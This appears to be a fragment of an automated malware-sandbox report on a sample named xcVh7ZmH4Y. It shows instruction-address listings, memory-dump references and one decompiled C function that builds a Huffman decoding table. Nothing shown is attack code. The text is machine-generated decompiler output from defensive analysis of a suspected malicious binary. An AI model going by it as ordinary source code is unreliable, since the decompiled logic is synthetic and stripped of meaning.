                                                                                      0x00407337
                                                                                      0x0040732d
                                                                                      0x0040732d
                                                                                      0x00407330
                                                                                      0x00407330
                                                                                      0x0040732b
                                                                                      0x00407322
                                                                                      0x00407339
                                                                                      0x0040733b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040733b
                                                                                      0x004072ba
                                                                                      0x004072ba
                                                                                      0x004072c0
                                                                                      0x004072c6
                                                                                      0x004072c8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004072ca
                                                                                      0x004072ca
                                                                                      0x004072cc
                                                                                      0x004072ce
                                                                                      0x004072d7
                                                                                      0x004072d7
                                                                                      0x004072d0
                                                                                      0x004072d0
                                                                                      0x004072d3
                                                                                      0x004072d3
                                                                                      0x004072d9
                                                                                      0x004072db
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407341
                                                                                      0x00407341
                                                                                      0x00407346
                                                                                      0x00407348
                                                                                      0x00407349
                                                                                      0x0040734a
                                                                                      0x0040734b
                                                                                      0x00407351
                                                                                      0x00407354
                                                                                      0x00407357
                                                                                      0x0040735a
                                                                                      0x0040735c
                                                                                      0x00407362
                                                                                      0x00407362
                                                                                      0x00407365
                                                                                      0x00407365
                                                                                      0x00407365
                                                                                      0x00407365
                                                                                      0x0040736e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407373
                                                                                      0x00407373
                                                                                      0x00407376
                                                                                      0x00407379
                                                                                      0x0040737b
                                                                                      0x00407412
                                                                                      0x00407412
                                                                                      0x00407415
                                                                                      0x00407417
                                                                                      0x00407418
                                                                                      0x00407419
                                                                                      0x0040741c
                                                                                      0x00000000
                                                                                      0x0040741c
                                                                                      0x00407381
                                                                                      0x00407381
                                                                                      0x00407387
                                                                                      0x00407389
                                                                                      0x004073ae
                                                                                      0x004073b1
                                                                                      0x004073b7
                                                                                      0x004073bc
                                                                                      0x004073c2
                                                                                      0x004073c8
                                                                                      0x004073ca
                                                                                      0x004073cd
                                                                                      0x004073d6
                                                                                      0x004073dc
                                                                                      0x004073dc
                                                                                      0x004073cf
                                                                                      0x004073d1
                                                                                      0x004073d3
                                                                                      0x004073d3
                                                                                      0x004073de
                                                                                      0x004073e4
                                                                                      0x004073e6
                                                                                      0x004073e9
                                                                                      0x004073eb
                                                                                      0x004073f1
                                                                                      0x004073f3
                                                                                      0x004073f5
                                                                                      0x004073f7
                                                                                      0x004073f9
                                                                                      0x004073fc
                                                                                      0x00407405
                                                                                      0x00407408
                                                                                      0x00407408
                                                                                      0x004073fe
                                                                                      0x004073fe
                                                                                      0x00407401
                                                                                      0x00407401
                                                                                      0x004073fc
                                                                                      0x004073f3
                                                                                      0x0040740a
                                                                                      0x0040740c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040740c
                                                                                      0x0040738b
                                                                                      0x0040738b
                                                                                      0x00407391
                                                                                      0x00407397
                                                                                      0x00407399
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040739b
                                                                                      0x0040739b
                                                                                      0x0040739d
                                                                                      0x0040739f
                                                                                      0x004073a6
                                                                                      0x004073a6
                                                                                      0x004073a8
                                                                                      0x004073a1
                                                                                      0x004073a1
                                                                                      0x004073a3
                                                                                      0x004073a3
                                                                                      0x004073aa
                                                                                      0x004073ac
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407424
                                                                                      0x00407424
                                                                                      0x00407427
                                                                                      0x00407429
                                                                                      0x0040742c
                                                                                      0x0040742f
                                                                                      0x0040742f
                                                                                      0x0040742f
                                                                                      0x0040742f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406add
                                                                                      0x00406ac1
                                                                                      0x00000000
                                                                                      0x00406ac7
                                                                                      0x00406aca
                                                                                      0x00406ad4
                                                                                      0x00406ad7
                                                                                      0x00406ada
                                                                                      0x00000000
                                                                                      0x00406ada
                                                                                      0x00406ac1
                                                                                      0x00406ae5
                                                                                      0x00406ae8
                                                                                      0x00406aec
                                                                                      0x00406af6
                                                                                      0x00406b00
                                                                                      0x00406b03
                                                                                      0x00406b09
                                                                                      0x00406c3d
                                                                                      0x00406c3f
                                                                                      0x00406c45
                                                                                      0x00406c48
                                                                                      0x00406c4b
                                                                                      0x00000000
                                                                                      0x00406c4b
                                                                                      0x00406b0f
                                                                                      0x00406b0f
                                                                                      0x00406b10
                                                                                      0x00406b68
                                                                                      0x00406b68
                                                                                      0x00406b6f
                                                                                      0x00406c15
                                                                                      0x00406c15
                                                                                      0x00406c1a
                                                                                      0x00406c1d
                                                                                      0x00406c22
                                                                                      0x00406c25
                                                                                      0x00406c2a
                                                                                      0x00406c2d
                                                                                      0x00406c32
                                                                                      0x00406c35
                                                                                      0x00406c35
                                                                                      0x00000000
                                                                                      0x00406b75
                                                                                      0x00406b75
                                                                                      0x00406b75
                                                                                      0x00406b75
                                                                                      0x00406b79
                                                                                      0x00406b79
                                                                                      0x00406b9b
                                                                                      0x00406b9e
                                                                                      0x00406ba0
                                                                                      0x00406ba3
                                                                                      0x00406ba8
                                                                                      0x00406b7e
                                                                                      0x00406b7e
                                                                                      0x00406b83
                                                                                      0x00406b85
                                                                                      0x00406b87
                                                                                      0x00406b8c
                                                                                      0x00406b92
                                                                                      0x00406b97
                                                                                      0x00406b99
                                                                                      0x00406b99
                                                                                      0x00406b8e
                                                                                      0x00406b8e
                                                                                      0x00406b8e
                                                                                      0x00406b8c
                                                                                      0x00000000
                                                                                      0x00406baa
                                                                                      0x00406bd7
                                                                                      0x00406bdc
                                                                                      0x00406bde
                                                                                      0x00406bdf
                                                                                      0x00406be1
                                                                                      0x00406be2
                                                                                      0x00406be2
                                                                                      0x00406be2
                                                                                      0x00406c0a
                                                                                      0x00406c0f
                                                                                      0x00406c0f
                                                                                      0x00000000
                                                                                      0x00406c0f
                                                                                      0x00406ba8
                                                                                      0x00406b6f
                                                                                      0x00406b12
                                                                                      0x00406b12
                                                                                      0x00406b13
                                                                                      0x00406b5d
                                                                                      0x00000000
                                                                                      0x00406b5d
                                                                                      0x00406b15
                                                                                      0x00406b16
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c72
                                                                                      0x00406c72
                                                                                      0x00406c72
                                                                                      0x00406c75
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c52
                                                                                      0x00406c52
                                                                                      0x00406c56
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c5c
                                                                                      0x00406c5c
                                                                                      0x00406c5f
                                                                                      0x00406c62
                                                                                      0x00406c67
                                                                                      0x00406c69
                                                                                      0x00406c6c
                                                                                      0x00406c6f
                                                                                      0x00406c6f
                                                                                      0x00406c6f
                                                                                      0x00406c77
                                                                                      0x00406c77
                                                                                      0x00406c7a
                                                                                      0x00406c7c
                                                                                      0x00406c81
                                                                                      0x00406c84
                                                                                      0x00406c86
                                                                                      0x00406c89
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c8f
                                                                                      0x00406c8f
                                                                                      0x00406c91
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c97
                                                                                      0x00406c97
                                                                                      0x00406c9b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406ca1
                                                                                      0x00406ca1
                                                                                      0x00406ca4
                                                                                      0x00406ca6
                                                                                      0x00406d44
                                                                                      0x00406d44
                                                                                      0x00406d47
                                                                                      0x00406d49
                                                                                      0x00406d49
                                                                                      0x00406d4c
                                                                                      0x00406d4f
                                                                                      0x00406d51
                                                                                      0x00406d53
                                                                                      0x00406d55
                                                                                      0x00406d55
                                                                                      0x00406d5e
                                                                                      0x00406d63
                                                                                      0x00406d66
                                                                                      0x00406d69
                                                                                      0x00406d6c
                                                                                      0x00406d6f
                                                                                      0x00406d6f
                                                                                      0x00406d6f
                                                                                      0x00406d72
                                                                                      0x00406d78
                                                                                      0x00406d78
                                                                                      0x00406d7e
                                                                                      0x00406d7e
                                                                                      0x00406d7e
                                                                                      0x00000000
                                                                                      0x00406d72
                                                                                      0x00406cac
                                                                                      0x00406cac
                                                                                      0x00406cb2
                                                                                      0x00406cb5
                                                                                      0x00406cb7
                                                                                      0x00406ce2
                                                                                      0x00406ce5
                                                                                      0x00406ceb
                                                                                      0x00406cf0
                                                                                      0x00406cf6
                                                                                      0x00406cfc
                                                                                      0x00406cfe
                                                                                      0x00406d01
                                                                                      0x00406d0a
                                                                                      0x00406d10
                                                                                      0x00406d10
                                                                                      0x00406d03
                                                                                      0x00406d05
                                                                                      0x00406d07
                                                                                      0x00406d07
                                                                                      0x00406d12
                                                                                      0x00406d18
                                                                                      0x00406d1b
                                                                                      0x00406d1d
                                                                                      0x00406d1f
                                                                                      0x00406d25
                                                                                      0x00406d27
                                                                                      0x00406d29
                                                                                      0x00406d2c
                                                                                      0x00406d35
                                                                                      0x00406d35
                                                                                      0x00406d37
                                                                                      0x00406d2e
                                                                                      0x00406d2e
                                                                                      0x00406d31
                                                                                      0x00406d31
                                                                                      0x00406d39
                                                                                      0x00406d39
                                                                                      0x00406d27
                                                                                      0x00406d3c
                                                                                      0x00406d3e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d3e
                                                                                      0x00406cb9
                                                                                      0x00406cb9
                                                                                      0x00406cbf
                                                                                      0x00406cc5
                                                                                      0x00406cc7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406cc9
                                                                                      0x00406cc9
                                                                                      0x00406ccb
                                                                                      0x00406ccd
                                                                                      0x00406cd0
                                                                                      0x00406cd7
                                                                                      0x00406cd7
                                                                                      0x00406cd9
                                                                                      0x00406cd2
                                                                                      0x00406cd2
                                                                                      0x00406cd4
                                                                                      0x00406cd4
                                                                                      0x00406cdb
                                                                                      0x00406cdd
                                                                                      0x00406ce0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406de4
                                                                                      0x00406de7
                                                                                      0x00406dea
                                                                                      0x00406df0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fc7
                                                                                      0x00406fc7
                                                                                      0x00406fc7
                                                                                      0x00406fca
                                                                                      0x00406fcd
                                                                                      0x00406fcf
                                                                                      0x00406fd2
                                                                                      0x00406fd8
                                                                                      0x00406fdf
                                                                                      0x00406fe1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406eb5
                                                                                      0x00406eb5
                                                                                      0x00406edd
                                                                                      0x00406edd
                                                                                      0x00406edd
                                                                                      0x00406edf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406ebd
                                                                                      0x00406ebd
                                                                                      0x00406ec1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406ec7
                                                                                      0x00406ec7
                                                                                      0x00406eca
                                                                                      0x00406ecd
                                                                                      0x00406ed0
                                                                                      0x00406ed2
                                                                                      0x00406ed4
                                                                                      0x00406ed7
                                                                                      0x00406eda
                                                                                      0x00406eda
                                                                                      0x00406eda
                                                                                      0x00406ee1
                                                                                      0x00406ee1
                                                                                      0x00406ee9
                                                                                      0x00406eec
                                                                                      0x00406ef2
                                                                                      0x00406ef5
                                                                                      0x00406ef9
                                                                                      0x00406efd
                                                                                      0x00406f00
                                                                                      0x00406f03
                                                                                      0x00406f1b
                                                                                      0x00406f1b
                                                                                      0x00406f1e
                                                                                      0x00406f2c
                                                                                      0x00406f2f
                                                                                      0x00406f20
                                                                                      0x00406f20
                                                                                      0x00406f22
                                                                                      0x00406f29
                                                                                      0x00406f29
                                                                                      0x00406f58
                                                                                      0x00406f58
                                                                                      0x00406f58
                                                                                      0x00406f5b
                                                                                      0x00406f5d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f38
                                                                                      0x00406f38
                                                                                      0x00406f3c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f42
                                                                                      0x00406f42
                                                                                      0x00406f45
                                                                                      0x00406f48
                                                                                      0x00406f4b
                                                                                      0x00406f4d
                                                                                      0x00406f4f
                                                                                      0x00406f52
                                                                                      0x00406f55
                                                                                      0x00406f55
                                                                                      0x00406f55
                                                                                      0x00406f5f
                                                                                      0x00406f5f
                                                                                      0x00406f61
                                                                                      0x00406f63
                                                                                      0x00406f6e
                                                                                      0x00406f71
                                                                                      0x00406f74
                                                                                      0x00406f76
                                                                                      0x00406f78
                                                                                      0x00406f7a
                                                                                      0x00406f7d
                                                                                      0x00406f80
                                                                                      0x00406f85
                                                                                      0x00406f88
                                                                                      0x00406f8b
                                                                                      0x00406f8e
                                                                                      0x00406f95
                                                                                      0x00406f98
                                                                                      0x00406f9a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fa0
                                                                                      0x00406fa0
                                                                                      0x00406fa4
                                                                                      0x00406fb5
                                                                                      0x00406fb5
                                                                                      0x00406fb5
                                                                                      0x00406fb7
                                                                                      0x00406fb7
                                                                                      0x00406fbb
                                                                                      0x00406fbb
                                                                                      0x00406fbb
                                                                                      0x00406fbd
                                                                                      0x00406fbe
                                                                                      0x00406fc1
                                                                                      0x00406fc1
                                                                                      0x00406fc1
                                                                                      0x00406fc4
                                                                                      0x00000000
                                                                                      0x00406fc4
                                                                                      0x00406fa6
                                                                                      0x00406fa6
                                                                                      0x00406fa9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406faf
                                                                                      0x00406faf
                                                                                      0x00000000
                                                                                      0x00406faf
                                                                                      0x00406f05
                                                                                      0x00406f05
                                                                                      0x00406f07
                                                                                      0x00406f09
                                                                                      0x00406f0c
                                                                                      0x00406f0f
                                                                                      0x00406f13
                                                                                      0x00406f13
                                                                                      0x00406fe7
                                                                                      0x00406fe7
                                                                                      0x00406fea
                                                                                      0x00406ff1
                                                                                      0x00406ff5
                                                                                      0x00406ff7
                                                                                      0x00406ffa
                                                                                      0x00406ffd
                                                                                      0x00407002
                                                                                      0x00407005
                                                                                      0x00407007
                                                                                      0x00407008
                                                                                      0x0040700b
                                                                                      0x00407016
                                                                                      0x00407019
                                                                                      0x00407030
                                                                                      0x00407035
                                                                                      0x0040703c
                                                                                      0x00407041
                                                                                      0x00407045
                                                                                      0x00407047
                                                                                      0x00407047
                                                                                      0x00407047
                                                                                      0x0040704a
                                                                                      0x0040704c
                                                                                      0x00000000
                                                                                      0x00407052
                                                                                      0x00407052
                                                                                      0x00407056
                                                                                      0x00407061
                                                                                      0x00407074
                                                                                      0x00407079
                                                                                      0x0040707e
                                                                                      0x00407080
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407086
                                                                                      0x00407086
                                                                                      0x00407089
                                                                                      0x0040708b
                                                                                      0x00407099
                                                                                      0x00407099
                                                                                      0x0040709c
                                                                                      0x0040709c
                                                                                      0x0040709f
                                                                                      0x004070a2
                                                                                      0x004070a5
                                                                                      0x004070a8
                                                                                      0x004070ab
                                                                                      0x004070ae
                                                                                      0x00000000
                                                                                      0x004070ae
                                                                                      0x0040708d
                                                                                      0x0040708d
                                                                                      0x00407093
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407093
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407432
                                                                                      0x00407432
                                                                                      0x00407438
                                                                                      0x0040743e
                                                                                      0x00407443
                                                                                      0x00407449
                                                                                      0x0040744f
                                                                                      0x00407451
                                                                                      0x00407454
                                                                                      0x0040745d
                                                                                      0x00407463
                                                                                      0x00407463
                                                                                      0x00407456
                                                                                      0x00407458
                                                                                      0x0040745a
                                                                                      0x0040745a
                                                                                      0x00407465
                                                                                      0x00407467
                                                                                      0x0040746a
                                                                                      0x004074a5
                                                                                      0x004074a5
                                                                                      0x00000000
                                                                                      0x0040746c
                                                                                      0x0040746c
                                                                                      0x0040746c
                                                                                      0x00407472
                                                                                      0x00407475
                                                                                      0x00407477
                                                                                      0x004074ac
                                                                                      0x004074ae
                                                                                      0x00000000
                                                                                      0x004074ae
                                                                                      0x00000000
                                                                                      0x00407477
                                                                                      0x00000000
                                                                                      0x00406ab6
                                                                                      0x00407484
                                                                                      0x00000000
                                                                                      0x00407484
                                                                                      0x00406e98
                                                                                      0x00406e9a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e9c
                                                                                      0x00406e9c
                                                                                      0x00406e9f
                                                                                      0x00000000
                                                                                      0x00406e9f
                                                                                      0x00406de4
                                                                                      0x00406da5
                                                                                      0x00407489
                                                                                      0x0040748c
                                                                                      0x0040748e
                                                                                      0x00407497
                                                                                      0x0040749d
                                                                                      0x00000000

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                      • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                                                      • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                      • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040755C Relevance: .3, Instructions: 300COMMONCrypto
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x432190;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x432190 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                                      0x00407567
                                                                                      0x0040756f
                                                                                      0x00407573
                                                                                      0x00407575
                                                                                      0x00407578
                                                                                      0x0040757a
                                                                                      0x0040757a
                                                                                      0x0040757c
                                                                                      0x00407583
                                                                                      0x00407585
                                                                                      0x00407585
                                                                                      0x0040758b
                                                                                      0x004075a0
                                                                                      0x004075a8
                                                                                      0x004075aa
                                                                                      0x004075ac
                                                                                      0x004075af
                                                                                      0x004075b0
                                                                                      0x004075b0
                                                                                      0x004075b6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004075b8
                                                                                      0x004075bb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004075bb
                                                                                      0x004075bf
                                                                                      0x004075c2
                                                                                      0x004075c4
                                                                                      0x004075c4
                                                                                      0x004075c7
                                                                                      0x004075cd
                                                                                      0x004075ce
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004075ce
                                                                                      0x004075d3
                                                                                      0x004075d6
                                                                                      0x004075d8
                                                                                      0x004075d8
                                                                                      0x004075de
                                                                                      0x004075e0
                                                                                      0x004075f1
                                                                                      0x004075e4
                                                                                      0x004075e8
                                                                                      0x0040788d
                                                                                      0x00000000
                                                                                      0x0040788d
                                                                                      0x004075ee
                                                                                      0x004075ef
                                                                                      0x004075ef
                                                                                      0x004075f7
                                                                                      0x004075fa
                                                                                      0x004075fe
                                                                                      0x00407600
                                                                                      0x00407602
                                                                                      0x00407605
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040760d
                                                                                      0x00407613
                                                                                      0x00407615
                                                                                      0x00407617
                                                                                      0x00407618
                                                                                      0x0040762d
                                                                                      0x0040762d
                                                                                      0x00407630
                                                                                      0x00407632
                                                                                      0x00407632
                                                                                      0x00407634
                                                                                      0x00407639
                                                                                      0x0040763b
                                                                                      0x00407642
                                                                                      0x00407644
                                                                                      0x0040764c
                                                                                      0x0040764c
                                                                                      0x0040764e
                                                                                      0x0040764f
                                                                                      0x0040765e
                                                                                      0x00407662
                                                                                      0x00407666
                                                                                      0x00407669
                                                                                      0x0040766c
                                                                                      0x00407671
                                                                                      0x00407674
